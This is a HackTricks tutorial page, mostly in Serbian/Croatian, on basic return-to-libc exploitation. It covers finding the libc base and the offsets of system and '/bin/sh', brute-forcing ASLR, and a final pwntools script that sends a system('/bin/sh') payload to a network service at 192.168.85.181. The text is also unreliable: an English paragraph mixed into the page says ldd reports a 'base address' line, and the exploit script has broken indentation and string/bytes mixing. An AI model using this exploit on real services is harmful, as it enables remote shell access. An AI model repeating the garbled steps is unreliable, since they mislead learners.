hacktricks/exploiting/linux-exploiting-basic-esp/ret2lib.md

<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>


**Ako ste pronašli ranjivu binarnu datoteku i mislite da je možete iskoristiti pomoću Ret2Lib, ovde možete pronaći neke osnovne korake koje možete pratiti.**

# Ako ste **unutar** **hosta**

## Možete pronaći **adresu lib**c
```bash
ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
```
Ako želite da proverite da li ASLR menja adresu libc-a, možete uraditi sledeće:
```bash
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done
```
## Dobijanje ofseta funkcije system

To get the offset of the system function, we can use the `objdump` command to analyze the binary file. The system function is usually located in the libc library, so we need to find the address of the system function in libc.

First, we need to identify the libc library used by the target binary. We can do this by running the `ldd` command followed by the path to the binary. This will display the shared libraries used by the binary, including the libc library.

Once we have identified the libc library, we can use the `objdump` command to analyze the library file. We need to find the address of the system function within the libc library. We can search for the system function using the `grep` command and the pattern `\<system\>`. This will give us the address of the system function.

With the address of the system function, we can calculate the offset by subtracting the base address of the libc library. The base address can be obtained by running the `ldd` command followed by the path to the libc library and looking for the "base address" line.

By subtracting the base address from the address of the system function, we can obtain the offset. This offset can be used in various exploitation techniques, such as return-to-libc attacks.
```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
```
## Dobijanje ofseta "/bin/sh"

Da biste dobili ofset "/bin/sh" u ciljnom programu, možete koristiti alat kao što je `pwntools` ili `ROPgadget`. Ovi alati vam omogućavaju da pronađete ofsete određenih stringova u bibliotekama koje su učitane u ciljni program.

Evo primera koda koji koristi `pwntools` biblioteku za dobijanje ofseta "/bin/sh":

```python
from pwn import *

elf = ELF('target_binary')
bin_sh_offset = next(elf.search(b'/bin/sh'))

print(f'Offset of "/bin/sh": {hex(bin_sh_offset)}')
```

Nakon izvršavanja ovog koda, dobićete ofset "/bin/sh" u heksadecimalnom formatu.
```bash
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
```
## /proc/\<PID>/maps

Ako proces svaki put kada komunicirate s njim (mrežni server) stvara **djecu**, pokušajte **pročitati** tu datoteku (vjerojatno će vam trebati root pristup).

Ovdje možete pronaći **točno gdje je učitan libc** unutar procesa i **gdje će biti učitan** za svako dijete procesa.

![](<../../.gitbook/assets/image (95).png>)

U ovom slučaju je učitan na adresi **0xb75dc000** (Ovo će biti bazna adresa libc-a)

## Korištenje gdb-peda

Dobijte adresu funkcije **system**, funkcije **exit** i stringa **"/bin/sh"** koristeći gdb-peda:
```
p system
p exit
find "/bin/sh"
```
# Zaobilazak ASLR-a

Možete pokušati da brute force-ujete baznu adresu libc-a.
```python
for off in range(0xb7000000, 0xb8000000, 0x1000):
```
# Kod
```python
from pwn import *

c = remote('192.168.85.181',20002)
c.recvline()    #Banner

for off in range(0xb7000000, 0xb8000000, 0x1000):
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive() #?
```
<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>